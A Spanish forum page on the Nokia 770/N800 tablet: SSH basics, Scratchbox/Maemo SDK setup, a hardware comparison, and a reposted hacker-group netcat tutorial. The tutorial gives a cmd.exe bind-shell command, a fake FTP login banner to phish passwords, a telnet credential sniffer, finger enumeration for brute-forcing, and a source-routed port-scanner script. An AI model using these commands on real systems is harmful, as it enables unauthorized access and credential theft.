ls -al directorio/subdirectorio/ lista archivos e información de ese subdirectorio
Crear, editar o eliminar archivos y directorios
pico /home/usuario/public_html/index.html edita el archivo index.html con el editor pico
touch /home/usuario/public_html/404.html crea el archivo vacio 404.html en ese directorio
rm archivo.txt elimina archivo.txt
rm -rf directorio/ ¡CUIDADO! elimina el directorio indicado, los subdirectorios y todos sus archivos
mkdir descargas Crea un directorio llamado descargas
rmdir descargas Elimina el directorio llamado descargas
Otros comandos SSH
cp -a /home/usuario/public_html/origen/* /home/usuario/public_html/destino/
Copia todos los archivos de un directorio a otro manteniendo sus respectivos permisos
du -sh muestra es espacio total ocupado por el directorio en el que se encuentra
du -sh * muestra el espacio ocupado de cada archivo y directorio
whoami muestra su nombre de usuario
-
[span style=\'font-size:21pt;line-height:100%\']Scratchbox, Proyectos Maemo[/span]
Con Scratchbox (=SDK) podras escribir, modificar, compilar, y probar programas en un PC x86 Linux (preferible que trabaje con una distibución que utilice paquetes debian como las aplicaciones de maemo).
Pre; ¿Que es Scratchbox? :
Re; Scratchbox es un cruce de herramientas de compilación pensado para los desarrollos embebidos de aplicaciones Linux del modo más sencllo. A traves de un completo sistema de herramientas para integrar y compilar una distribución entera de Linux.
[span style=\'font-size:30pt;line-height:100%\']PROJECTOS MAEMO[/span]
Desde scratchbox enviar los siguientes comandos Linux:
[sbox-SDK_PC: ~] > wget https://garage.maemo.org/projects/mweather/...ther_0.8.tar.gz (https://garage.maemo.org/projects/mweath)
[sbox-SDK_PC: ~] > tar xzvf mweather_0.8.tar.gz
[sbox-SDK_PC: ~] > cd mweather_0.8
[sbox-SDK_PC: ~mweather_0.8 ] > dpkg-buildpackage -rfakeroot -b
[ sbox-SDK_PC: ~/maemopad] > cd..
[sbox-SDK_PC: ~] > ls
mweather
mweather_0.8_i386.deb
[sbox-SDK_PC: ~] > fakeroot dpkg -i mweather_0.8_i386.deb
Selecting previously deselected package mweather.
(Reading database... 20 files and directories currently installed.)
Unpacking mweather (from mweather_0.8_i386.deb)...
Setting up mweather (0.8)...
Listo ! Ya puedes ver la aplicación en el menú de opciones dentro de Maemo GUI.
http://www.kernelconcepts.de/~nils/Maemo-Development.html
http://www.maemo.org/platform/docs/tutorials/Maemo_tutorial.html
http://thoughtfix.blogspot.com/2007/01/so-you-want-to-be-nokia-internet-tablet.html
[img]http://scratchbox.org/pics/logo.jpg\" border=\"0\" class=\"linked-image\" /] [span style=\'font-size:25pt;line-height:100%\']Download [/span] (http://scratchbox.org/download/)
http://scratchbox.org/download/
scratchbox-core
scratchbox-devkit-debian
scratchbox-doctools
scratchbox-libs
scratchbox-toolchain-arm-glibc
scratchbox-toolchain-i686-glibc
[img]http://scratchbox.org/~rvoipio/sbrsh.png\" border=\"0\" class=\"linked-image\" /]
# sudo dpkg -i scratchbox*.deb
adherir tú login a la lista de users list
sudo mv Maemo_Dev_Platform_RS_v1.1_*.tgz /scratchbox/packages
scratchbox
adherir tú .bash_profile
export LANGUAGE=en_GB
export PAGER=less
export DISPLAY=:2
sbox-config -ct SDK_PC
Select the i686-linux-gcc-3.3_3.3.4-glibc-2.3.2.ds1 compiler
Select the none method
Select the debian dev kit
sbox-config -st SDK_PC
sbox-config -er /scratchbox/packages/Maemo_Dev_Platform_RS_v1.1_i386.tgz
sbox-config -cc
sbox-config -cf
Change to a different terminal
Put the following in a file called start-xephyr.sh
#!/bin/sh -e
prefix=/scratchbox/users/${LOGNAME}/targets/SDK_PC/usr
export LD_LIBRARY_PATH=${prefix}/lib; export LD_LIBRARY_PATH
exec ${prefix}/bin/Xephyr :2 -host-cursor -screen 800x480x16 -dpi 96 -ac
chmod +x start-xephyr.sh
./start-xephyr.sh
[img]http://www.kernelconcepts.de/~nils/xephyr-desktop.png\" border=\"0\" class=\"linked-image\" /]
In scratchbox:
af-sb-init.sh start
starts the gui
af-sb-init.sh stop
stops the gui
Back to scatchbox terminal
sbox-config -ct SDK_ARM
Select the arm-linux-gcc-3.3_3.3.4-glibc-2.3.2.ds1 compiler
Select qemu-arm CPU-transparency
Select the debian devkit
sbox-config -st SDK_ARM
sbox-config -er /scratchbox/packages/Maemo_Dev_Platform_RS_v1.1_arm.tgz
sbox-config -cc
sbox-config -cf
[img]http://www.kernelconcepts.de/~nils/maemopad1.png\" border=\"0\" class=\"linked-image\" /]
[img]http://www.kernelconcepts.de/~nils/maemopad2.png\" border=\"0\" class=\"linked-image\" /]
-
[span style=\'font-size:21pt;line-height:100%\']Netcat para Nokia 770[/span]
[span style=\'font-size:21pt;line-height:100%\'] Introducción[/span]
Netcat es un pequeño programa creado para uso de los administradores de redes (y por supuesto para los Hackers) , este proggie fué creado originalmente por Hobbit y porteado a Win95 y NT por Weld Pond de L0pht , tiene mas de un año desde que fué Liberado y muy poco se ha escrito sobre este Programita; Principalmente porque la estructura de sus comandos es poco familiar para el usuario medio. Netcat tiene infinidad de funciones, aunque se deja que sea el usuario quien las averigue , y en el archivo de ayuda ponen algunos ejemplitos muy elementales solamente...
La especialidad de NetCat es el Protocolo tcp/ip, y le dá a la máquina de windows, cierto poder sobre este protocolo que solo tenía UNIX, trabaja con lineas de comandos desde MS-DOS (o desde el Shell de Linux), y según parece, puede hacer casi cualquier cosa sobre TCP/IP. El comando principal es nc con su respectiva variable u opción al mas puro estilio Unix.
Cabe destacar que la información sobre Netcat y sus usos especificos es bastante limitada; aunque Hobbit en su documento aclara muchas cosas, cita algunos ejemplos y dice que NetCat puede ser utilizado para mas de 1001 vainas...
Netcat puede ser encontrado en:
http://www.l0pht.com/~weld/netcat
[span style=\'font-size:30pt;line-height:100%\']Versión NETCAT para Nokia 770[/span] http://vidar.gimp.org/770/
http://vidar.gimp.org/770/netcat_1.10-32_armel.deb
http://vidar.gimp.org/770/rsync_2.6.8-2_armel.deb
[span style=\'font-size:21pt;line-height:100%\']Netcat en WinX[/span]
Este es el resultado de el comando de ayuda de netcat en una máquina windows
c:>nc -h
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, stealth mode
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]
Bien; un analisis rápido de estas variables nos da una idea del
potencial de este pequeño programa y las infinitas posibilidades que nos
ofrece el poder manejar conexiones de una manera tan básica y sencilla:
<------ Opciones de Netcat --------->
-d (Modo Stealth o encubierto)
Esta opción desvincula al Programa de la consola, haciendolo
trabajar en el BackGround.
-e (Ejecuta un programa cuando se conecta)
Puede ser utilizado para ejecutar incluso un Shell tanto
en WinX como en *NIX.
-l (Escuchando conexiones)
Deja a un puerto abierto en espera de una conexión
-L (lo mismo que anteriormente pero sigue escuchando aún cuando la
conexión es cerrada)
Esta opción es incluida en la versión de Weld Pond de L0pth, y
es muy util para seguir escuchando en el puerto, a diferencia de -l
(que la conexión cerrada termina con el proceso de nc) esta opción -L
permite seguir escuchando en el mismo puerto (la rutina de nc -l es
reiniciada).
-n (Dirección numerica especifica; no hace un DNS Lookup) Netcat tiene la
facultad de resolver nombres de dominio mediante un DNS Lookup, con esta
opción le especificamos que no lo haga, y use solamente direcciones IP.
-o (obtiene un archivo log en Hex de la acción) Genera un Log de
las actividades de netcat en código Hexadecimal.
-p (Puerto para pegarse) Algunas veces debes especificarle con esta
opción el puerto a realizar una acción.
-s (pegarse a un IP especifico) Netcat puede utilizar IP de una red
como fuente local.
-t (Funciona como un pequeño demonio telnet) Con esta opción le especificas
a netcat que debe realizar negociaciones telnet.
-u specify UDP (Utilizar Protocolo UDP) Con esta opción le dices a netcat que
trabaje con protocolo UDP en vez de TCP.
-v (modo verbose, mas información, se le puede añadir otra -v para mas
info todavia) Bastante util y necesario, sobre todo para estudiar demonios
en profundidad y observar todos los detalles en un Sniffing.
-w (Especifica un tiempo para terminar) Con esta opción le especificas un
tiempo determinado para realizar conexiones .
-r (Genera un Patron Ramdom de puertos locales o remotos) Muy util para evitar
patrones lógicos de Scanning.
-g (especificar Gateways) Una de las opciones más interesantes de netcat,
permite utilizar Routers como "puentes" de conexión.
-G (Especificar puntos de Routing), Con esta opción podemos crear
una cadenaaleatoria de hosts para crear un ruta perdida para tus paquetes
(Spoofing).
-i Especifica un intervalo de segundos entre puertos Scaneados.
Autor: Kliver
ssh control , netcat
http://www.youtube.com/watch?v=CDRaO50XbnM (http://www.youtube.com/watch?v=CDRaO50XbnM)
Tunnel Everything through SSH
http://www.plenz.com/tunnel-everything (http://www.plenz.com/tunnel-everything)
[span style=\'font-size:25pt;line-height:100%\']Netcat en Linux[/span]
Netcat en una plataforma como Linux se convierte en una utilidad muy potente, pudiendo ser utilizado en conjunto con lenguajes de programación como Perl y C , o bien desde la propia Linea de comandos del poderoso Shell de Linux mediante Shell Scripts.
Cabe destacar que distribuciones como RedHat Linux trae junto con sus paquetes de instalación una versión limitada de netcat; lo mas recomendable es bajar de la red la versión full de netcat para Linux (Importante: La versión de netcat para linux viene a prueba de lamers, por lo cual debemos compilar a netcat con unos flags especiales para poder obtener las opciones -t y -e (Telnet y Gaping Security Hole) ). Bajas el .tar de netcat y lo desempaquetas en el directorio de tu preferencia, te ubicas dentro del directorio de netcat y lo compilas con Make utilizando las siguientes Flags:
[root@DarkStar] #make linux DFLAGS=" -DTELNET -DGAPING_SECURITY_HOLE"
Copias el binario (nc) al directorio /usr/bin , de esta manera podras usar netcat directamente llamandolo de cualquier parte del Shell, ademas de que podrás usar los scripts que hagas (o consigas en la red) sin problemas; netcat trae unos scripts muy interesantes y bien comentados para que los estudies y comprendas mejor su implementación en scripts, los scripts están en el directorio donde desempaquetastes netcat en /scripts , los corres como siempre: ./probe (o el script que quieras).
[span style=\'font-size:21pt;line-height:100%\'] Utilizando Netcat.[/span]
Para ilustrar mejor como trabajamos con este programa, lo mejor es observar ejemplos prácticos y analizar su estructura para poder comprender mejor como funciona y así poder crear nuestras propias aplicaciones.
Algunas de las cosas que podemos hacer con NetCat son:
Obtener un Shell rapidamente en una máquina remota usando la opción -l (Listen) conjuntamente con la opción -e (ejecutar) , cuando el proggie corre con estas variables y la conexión es realizada, NetCat ejecuta el programa elegido y se conecta a stdin y stdout del programa en la conexión a la red.
nc -l -p 23 xxx.xxx.xxx.xx 23 -t -e cmd.exe
Este comando dejará a NetCat escuchando el Puerto 23 (telnet), cuando es conectado a travéz del cliente, ejecutará un Shell (cmd.exe) la opción -t le dice a NetCat que maneje cualquier negociación que el cliente pueda esperar....
Si esta conexión es realizada desde una máquina NT, el shell correrá los permisos del proceso que han generado a NetCat (Hmmm...) así que hay que ser muy cuidadosos
La belleza de NetCat es que puede hacer lo mismo en CUALQUIER puerto Puedes dejar a NetCat escuchando en los puertos NETBIOS, que están probablemente corriendo en la mayoría de las máquinas NT, de esta manera puedes lograr una conexión a una máquina que esté utilizando "Filtrado de Puertos" activado en TCP/IP security Network Control Panel, NT no parece tener ninguna seguridad alrededor de cuales puertos los programas de usuarios son permitidos amarrar, esto quiere decir en pocas palabras, ejecutar comandos y programas que puedan unirse a los Puertos NETBIOS.
Como anteriormente se mencionó, puedes utilizar a Netcat para estudiar diferentes puertos, con la siguiente sintaxis:
c:\>nc -v <IP> <puerto> (puedes añadir otra -v)
Uno de los puertos mas interesantes a la hora de analizar un Host, es el puerto 79 (Finger) , puedes obtener nombres de usuarios e información muy util a la hora de planear un "Brute-Force Attack", este comandito de Netcat te muestra la Flexibilidad del Proggie en cuestión, dandote una idea de sus posibilidades:
c:\>nc -v <host> 79 < user.txt > log.txt
El comando anterior le dice a netcat que se conecte en modo verbose al Host predeterminado en el puerto 79 (Finger) y envie el contenido del archivo user.txt (OJO: no he probado esto con una posible lista de nombre de usuarios al azahar), la respuesta del servicio será guardada en el archivo log.txt
[span style=\'font-size:21pt;line-height:100%\']Scanner[/span]
Netcat puede ser utilizado como scanner, sus multiples opciones le permiten realizar un gran número de combinaciones, pudiendo realizar Scannings en Puertos Random, en puertos conocidos, en modo ascendente o descendente, con intervalos de tiempo, utilizando gateways para evitar mostrar la IP fuente del Scanning, etc.
C:\nc11nt>nc -v -v -z 127.0.0.1 53 25 21
DNS fwd/rev mismatch: localhost != darkstar
localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 25 (smtp): connection refused
localhost [127.0.0.1] 21 (ftp): connection refused
sent 0, rcvd 0: NOTSOCK
Pues si; aqui tienen un pequeño y primitivo scanner, se le pueden añadir puertos escogidos como en el ejemplo anterior o asignarle un rango de puertos:
C:\nc11nt>nc -v -v -z 127.0.0.1 1-53
DNS fwd/rev mismatch: localhost != darkstar
localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 52 (?): connection refused
localhost [127.0.0.1] 51 (?): connection refused
localhost [127.0.0.1] 50 (?): connection refused
localhost [127.0.0.1] 49 (?): connection refused
localhost [127.0.0.1] 48 (?): connection refused etc...
Volvemos con la opción -v (verbose) y la Opción -z (zero i/o) que es usada para scanning, los puertos se lo especificamos al final del IP del host, bien sea individuales separados por un espacio; o por un rango de puertos.
[span style=\'font-size:30pt;line-height:100%\']Sniffer[/span]
Otra de las interesante posibilidades de netcat es su capacidad para escuchar conexiones en cualquier puerto, pudiendo redireccionar todo el tráfico del mismo hacia un archivo o hacia pantalla, en este sencillo ejemplo, podemos observar las bases de un sencillo sniffer en Windows:
C:\nc11nt>nc -v -v -L 127.0.0.1 -p 23
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 ...
DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1131
login: sniffado
password: jeje!!
puedo ver todo lo que escriben aqui... Muuuaaahahahahahah!!! B-]
Tambien podemos redireccionar toda la salida a un archivo e irnos a realizar otras actividades ,ientras netcat hace su trabajo:
C:\nc11nt>nc -v -v -L -p 23 127.0.0.1 -t >login.txt
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 ...
[Aqui viene la conneción...]
DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1030
[Todo lo que escriba la connección se va al archivo login.txt]
sent 0, rcvd 42
[La opción -L permite que netcat escuche nuevamente al terminar la conexión, "New Victims Wanted" Hehe!]
DNS fwd/rev mismatch: localhost != darkstar
listening on [127.0.0.1] 23 ...
El Exploit-Explained: nc -v -v -L 127.0.0.1 -p 23
---------------------
Ejecutamos a Netcat con la opción o variable -v (verbose) (doblemente "verbose" por si acaso) esto hará que el resultado de netcat, sea mostrado directamente en pantalla (a diferencia del archivo usado por Dr._X) , la opción o variable -L (Listen, and listen again) nos permitirá dejar escuchando u "oliendo" en determinado puerto aun cuando la conexión sea interrumpida (listen again), con la variable -p le indicamos el puerto...
Al ejecutar a netcat con esa combinación de variables las opción -v me indica en pantalla el Host y el puerto de escucha:
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 ...
Realizo desde otra ventana un telnet a localhost (127.0.0.1) en el puerto 23, netcat me informa sobre lo que ocurre en el puerto 23:
DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1131
login: sniffado
Voilá! un Sniffer en LocalHost! Jajaja!!!
-
[span style=\'font-size:21pt;line-height:100%\'] Detector de Conexiones Sospechosas[/span]
La posibilidad de dejar a netcat escuchando en determinados puertos, nos permite crear una especie de "trampa" para un supuesto agresor que utilize scanners, o herramientas tales como NetBus o BackOrifice en contra de nuestras estaciones. Incluso, podemos crear un archivo que haga un Flood y redireccionar su salida hacia la estación agresora en caso de una conexión no autorizada a determinado puerto. (jeje! y se me ocurren un monton de cosas más, Muaahahaha!)
Este es un ejemplo de un detector de BO, Je! y funciona! este es un ejemplo real de un dia como cualquier otro en IRC; he aquí el ejemplo:
C:\nc11nt>nc -u -v -v -L -p 31337 127.0.0.1 31337
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 31337 ...
invalid connection to [0.0.0.0] from nas1-064.ras.bqm.cantv.net
[161.196.246.65]
31338
Back Orifice utiliza el protocolo UDP para realizar sus travesuras, realiza la conexión desde un puerto aleatorio (casi siempre el 1080) aunque en este caso lo hizo desde el 31338 (posiblemente una variante de BO), por eso se utiliza la opción -u (protocolo udp), netcat se queda esperando conexiones UDP en el puerto 31337 (default de BO) , cuando alguien hace un sweep a tu IP netcat lo detecta enviando a pantalla el IP y el DNS del agresor...
Luego un pequeño "Ping of Death" (Nuke) para el transgresor y le hacen un Scan para ver cuando desaparece B-]
nas1-064.ras.bqm.cantv.net [161.196.246.65] 48 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 47 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 46 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 45 (?): TIMEDOUT
nas1-064.ras.bqm.cantv.net [161.196.246.65] 44 (?): TIMEDOUT<--
Chao!!! Jeje!![span style=\'font-size:19pt;line-height:100%\'][/size]
[span style=\'font-size:21pt;line-height:100%\'] Otros usos Miscelaneos[/span]
Puedes utilizar algo de ingienería social para capturar algunos passwords con netcat, por ejemplo, si una máquina no tiene abierto el puerto de FTP o de telnet, creas un archivo de texto que solicite el ID y el Password de la víctima; algo así:
Microsoft Internet FTP Server V.5.9 [Beta]
04/16/99 myhost.com
Please introduce Username, password and press "Enter" LogOn:
Luego redireccionas el archivo hacia la victima:
C:\nc11nt>nc -v -v -L -p 21 nombre del host -t < login.txt
Si el tonto cae... Ahí va tu password, Jeje!! B-] un poco de imaginación y maña te permitirán encontrar muchas utilidades para netcat.[span style=\'font-size:19pt;line-height:100%\'][/span]
[size=14] Netcat en Vez de Telnet[/span]
Yo personalmente prefiero usar netcat para realizar connecciones remotas como alternativa al Telnet. la ventaja de realizar conexiones telnet desde netcat es que este esconde "algo" sobre tu conexión, lo que lo hace más "sigiloso" que telnet, (de ahí por que lo llamaron netcat), realizando una conexión "Limpia" en determinado puerto, obviando las negociaciones comunes de Telnet que pueden confundir al cliente en determinados casos, como por ejemplo, al utilizar ciertas Backdoors muy conocidas en Unix.
OJO: algunas máquinas interpretan al cliente de telnet y asumen el nombre del usuario que lo utiliza, de allí el porqué algunos servidores solo preguntan por password ; teoricamente netcat no envia esta información. Por eso, es recomendable acostumbrarse a utilizar netcat para hacer conexiones remotas:
c:> nc -v nombre del host 23(o el puerto de tu preferencia)
[span style=\'font-size:21pt;line-height:100%\']Netcat y Programación[/span]
Esta combinación desencadena todo el Poder de Netcat en su máxima expresión; Tratandose de una herramienta que funciona con lineas de comandos, su integración con un lenguaje de programación le permite realizar gran cantidad de tareas, y posibilidades se van descubriendo dia a dia con su inclusión en nuevos Scripts y Exploits.
Muchos ScriptKiddies que no tienen idea de lo que hacen, se sienten frustrados porque muchos de los Scripts y Exploits que bajan de la Red simplemente no les funciona, porque no saben interpretar el Código y por lo tanto son incapaces de efectuar las modificaciones necesarias para incluir librerias, paths o utilidades necesarias para su funcionamiento. (Jódanse ScriptKiddies!!! Jajaja!!)
Netcat es exelente para implementar exploits remotos, permitiendo enviar el código a cualquier puerto vulnerable con una simple orden, logrando ejecutar todos los comandos necesarios para explotar determinados servicios.
Varios exploits que circulan actualmente en la Red, usan a netcat como "motor" para manejar las conexiones, si analizamos el código de estos programas podemos observar un nc por ahí, esto significa que el Proggie en cuestión necesita una versión correctamente compilada de netcat en el directorio /usr/bin . A continuación un pequeño programa realizado por el Doctor_X de Hven utilizando a netcat:
<---------- Hven Port Scanner!! ------>
# !/bin/bash
# Scanner de Puertos
# By DoctorX 17/04/99 email: d0ct0r_x@bactery.8m.com
# Zona de Bacterias http://bactery.8m.com
# Hackers de Venezuela http://www.hackhour.com.br/hven
# Este es un shell script hecho por mi para la verificacion de
# conexiones a un host utilizando netcat.
# Declaracion de Variables
export NETCAT=" nc -v -v -w 8 -z "
export RANGO=$2
LOCALHOST=$(uname -n)
export PUERTOS="21 23 25 79 80 110 111 113 139 143 513 514 515 6000 31337"
export MEM1="Scanner de Puertos "
export MEM2="by "
export MEM22="para Hackers Venezuela"
export MEM3="Victima : "
export MEM4="Falta el GateWay para el Source Routing !!!!!!"
export MEM5="Te van a pillar !!!!!!! $USER jejejejeje "
export MEM6="Local Host : $LOCALHOST "
export MEM7="UDP Scan "
export MEM8="http://www.hackhour.com.br/hven"
export re="[5m"
export cl="[0m"
export rojo="[31m"
export email="email:d0ct0r_x@bactery.8m.com"
# Declaracion de Funciones
# Mensaje cuando no se le dan Parametros
function mem() {
local uso="uso :$0 [opcion] "
local DRX="DoctorX"
echo $MEM1
echo $MEM2 ${rojo}$DRX${cl} $MEM22
echo $MEM8
echo ${rojo}$uso${cl}
echo " :IP/HOSTNAME de La Victima jejejeje "
echo " :source-routing , es opcional "
echo "opciones : "
echo "u :esta opcion de utiliza para hacer scan udp"
echo "so :Determinacion de SO de servidores Web"
echo "r rango_de_puertos :Cambia el rango de puertos por defecto :plow-phi" &&
exit; }
# Mensaje Inicial
function mem2() {
VICTIMA=$1
echo $MEM1
echo $MEM2 ${rojo}DoctorX${cl} $MEM22
echo $MEM3 $VICTIMA
echo $MEM6; }
# Mensaje 2
function mem_web() {
mem_web1="Hackers Venezuela"
mem_web2="By"
mem_web3="Victima : "
VICTIMA=$1
mem_web4="Determinacion de SO en Web Servers"
echo $mem_web1
echo $mem_web4
echo $mem_web2 ${rojo}DoctorX${cl} $email
echo $mem_web3 $VICTIMA;}
# Scan Tcp
function tcp() {
HOST=$1
$NETCAT $HOST $PUERTOS; }
# Scan Tcp con Rango
function tcp_rango() {
HOST=$2
RANGO=$1
$NETCAT $HOST $RANGO; }
# Scan UDP
function udp() {
VICTIMA=$1
echo $MEM7
$NETCAT -u $VICTIMA $PUERTOS; }
# Scan UDP con gateway
function udp_gateway() {
echo $MEM7
VICTIMA=$2
GATE=$1
NETCAT_GATE="nc -v -v -z -u $VICTIMA -g $GATE "
$NETCAT_GATE $PUERTOS; }
# Scan con Source Routing
function tcp_gateway() {
GATE=$1
HOST=$2
RANGO=$PUERTOS
echo "Gate : $GATE "
$NETCAT -g $GATE $HOST $RANGO; }
# Advertencia
function adv() {
local MEM4="Falta el GateWay para el Source Routing !!!!!!"
local MEM5="Te van a pillar !!!!!!! $USER jejejejeje "
echo ${rojo}$MEM4${cl}
echo ${re}${rojo}$MEM5${cl}; }
# Determinacion de SO
function web_so() {
NC="nc -w "
HTTPPORT="80"
GET="GET /"
ECHO="/bin/echo"
HEAD="HEAD / HTPP/1.0"
HTTPVARIABLE="Server:"
WEB_SERVER="$1"
LOG="salida.txt"
#CHECKHTTP=( echo $GET; sleep 5)| $NETCAT $VICTIMA 80
( echo $HEAD; echo; echo ) | $NC 8 $WEB_SERVER $HTTPPORT | grep $HTTPVARIABLE | cut -d: -f2 1> $LOG
cat $LOG
rm -f $LOG;}
# Seleccion de Opcion
case $# in 0 ) mem;;
1 ) mem2 $1;
adv;
tcp $1;;
3 ) if [ "$1" != "r" ]; then
mem2 $2
udp_gateway $3 $2
else { mem2 $3
adv
tcp_rango $2 $3;}
fi;;
2 ) if [ "$1" != "u" ]; then
if [ "$1" != "so" ]; then
{ mem2 $1
# adv
tcp_gateway $2 $1;}
else { mem_web $2
web_so $2;}
fi
else { export HOST=$2
mem2 $HOST
udp $2
exit 0;}
fi;
esac
[span style=\'font-size:21pt;line-height:100%\']Conclusión[/span]
Si estudiamos detalladamente las variables, el misterio de netcat desaparece, viene la parte de la imaginación; ¿Que otras funciones le podemos asignar? ¿Que mas podría hacer? ; al revisar el programa que envió Dr._X me dije: "Lógico! Hmmm... Y que tal si hacemos asi..." ; el hacking no es más que probar nuevas posibilidades, utilizando el ingenio, los conocimientos acumulados y una dosis bastante fuerte de imaginación podremos lograr loque queramos.
Si tienes otras ideas, utilidades, programas o forma innovadora para utilizar netcat, escribenos un mail, estaré encantado de anexarlo en este documento....
Este Documento fué Realizado por Kliber, Agradecimientos especiales a Doctor_X (Code Freak) , DarkDeath, y a todos los miembros de nuestra comunidad por su invaluable Colaboración.
==============================
kliber@hven.com.ve
Hackers Venezuela
"El Conicimiento es Poder!!"
http://hven.com.ve (http://hven.com.ve)
==============================
[span style=\'font-size:30pt;line-height:100%\']Epilogo del Tutorial de Netcat[/span] (http://www.wikilearning.com/tutorial_de_netcat-wkc-629.htm)
Tabla de contenidos
1. Introducción
2. Netcat en WinX
3. Netcat en Linux
4. Utilizando Netcat.
5. Scanner
6. Sniffer
7. Detector de Conneciones Sospechosas
8. Otros usos Miscelaneos
9. Netcat en Vez de Telnet
10. Netcat y Programación
11. Conclusión
http://www.wikilearning.com/tutorial_de_netcat-wkc-629.htm
-
[span style=\'font-size:21pt;line-height:100%\']Nokia 770 vs. Nokia 800, Internet Tablet[/span]
[span style=\'font-size:14pt;line-height:100%\']Renovarse o morir[/span]
[span style=\'font-size:25pt;line-height:100%\']Nokia 770 Internet Tablet [/span]
[img]http://img.dooyoo.es/ES_ES/175/ordenadores/pda/nokia-770-internet-tablet.jpg\" border=\"0\" class=\"linked-image\" /]
[span style=\'font-size:25pt;line-height:100%\']Nokia N800 Internet Tablet (RX-34) [/span]
[img]http://www.linuxdevices.com/files/misc/nokia-n800-2-sm.jpg\" border=\"0\" class=\"linked-image\" /]
[span style=\'font-size:25pt;line-height:100%\']Nokia 770 Internet Tablet [/span]
Información técnica
General
Tipo de producto-------------------------Web tablet
Dispositivos integrados------------------Display
Anchura -----------------------------------14.1 cm
Profundidad-------------------------------1.9 cm
Altura--------------------------------------7.9 cm
Peso--------------------------------------- 230 g
Color---------------------------------------Negro, plateado mate
Nokia 800;
Volume: 137 cc
Altura--------------------------------------75
Anchura -----------------------------------14,4 cm
Anchura -----------------------------------13 (/18) mm
Color---------------------------------------Gris, Plateado
* 24 gramos más de peso para el Viejo Nokia 770, en dimensiones andan a la par; 1,9/1,8, 14.1/14.4... y diferencía de color, de Negro 770 a Gris 800, el pinguino de tú bolsillo se ha puesto a dieta, jejeje
[span style=\'font-size:25pt;line-height:100%\']Nokia 770 Internet Tablet [/span] Memoria
ROM----------------------------------------128 MB - Flash
Memoria RAM------------------------------64 MB - DDR SDRAM
Memoria Flash-----------------------------RS-MMC - 64 MB con adapatador incluida en el paquete
Tarjetas de memoria flash soportadas--RS-MMC
Nokia 800 Memoria
ROM------------ ---------------------------256MB - Flash
RAM----------------------------------------128
Memoria Flash-----------------------------128 MiniSD con adapatador incluida en el paquete
2 Slot para ampliar con Memorias Flash internas, tipo SD, MicroSD, MiniSD, MMC, y RS-MMC. Compatible compatible con tarjetas de más de 2GB. Configurable hasta un máximo de 4GB.
En este apartado mejora notablemente el N800 sobre el anterior N770, en cuanto a posibilidades de ampliación, así como tamaños soportados
[span style=\'font-size:25pt;line-height:100%\']Nokia 770 Internet Tablet [/span] Display
Tipo de pantalla----------------------------Matriz activa TFT
Imagen 16 bits-----------------------------(64K colores)
Resolución de pantalla---------------------800 x 480
Nokia 800 Display
Alta Resolucion de pantalla táctil (800 x 480 pixels) con una profundidad de 65.000 colores
* Identicas prestaciones para Nokia 770/800, aquí no hay cambios, solo esperemos que la "muerte subita" de aquellas pantallas de la 1ª edición este finalmente resuelta, solo el tiempo confirmara este aspecto
[span style=\'font-size:25pt;line-height:100%\']Nokia 770 Internet Tablet [/span] Audio
Audio salida----------------------------------Altavoz/altavoces
Formatos de audio digital admitidos-------MP3, WMA, WAV, AAC, Real Audio, AMR, MP2
Video: MPEG1, MPEG4, Real Video, H263, AVI, 3GP
Nokia 800 Audio
Audio: AAC, AMR, MP2, MP3, RA (RealAudio), WAV, WMA
Imagen: BMP, GIF, ICO, JPEG, PNG, TIFF, SVG-tiny
Video: 3GP, AVI, H.263, MPEG-1, MPEG-4, RV (Real Video)
Internet radio playlists: M3U, PLS
* Mejora de soportes aceptados para Nokia 800, como es de esperar de una revisión del próducto
[span style=\'font-size:25pt;line-height:100%\']Nokia 770 Internet Tablet [/span] Telecom, Expansión / Conectividad
Conectividad Inalámbrica-------------------Bluetooth, IEEE 802.11b, IEEE 802.11g
Total ranuras de expansión (libres)--------1 RS-MMC
Interfaces-------------------------------------1 x Hi-Speed USB
1 x auriculares - -----------------------------mini-conexión telefónica estéreo 3,5 mm
Nokia 800 Telecom, Expansión / Conectividad
stereo speakers headset (HS-48) y microphono sensitive
Nokia 800 Telecom
Conectividad Inalámbrica-------------------WLAN: 802.11b/g
Bluetooth: 2.0. Para conexiones a Internet a traves de Telefónia Móvil y transferencía de archivos
Perfiles soportados: Dial-up Networking, File Transfer, Generic Access, SIM Access, Object Push Profile, Human Interface Profile, and Serial Port profiles
USB 2.0 high speed para conexión a PC
* Lo de acceso SIM no me queda claro, si es para targetas GSM??? como organizador de agenda???
[span style=\'font-size:25pt;line-height:100%\']Nokia 770 Internet Tablet [/span] Dispositivo de entrada
Tipo---------------------------------------------Pantalla sensible al tacto, lápiz
Diverso
Accesorios incluidos---------------------------Maleta de transporte, auriculares, base, lápiz adicional
Alimentación
Dispositivo de alimentación------------------Adaptador de corriente
Batería Battery (BP-5L)
Cantidad instalada (máximo soportado)-----1
Capacidad--------------------------------------1500 mAh
Duración (hasta)-------------------------------3 horas
Tiempo en espera------------------------------Hasta 168 horas
Nokia 800 Dispositivo de entrada
Batería Battery (BP-5L)
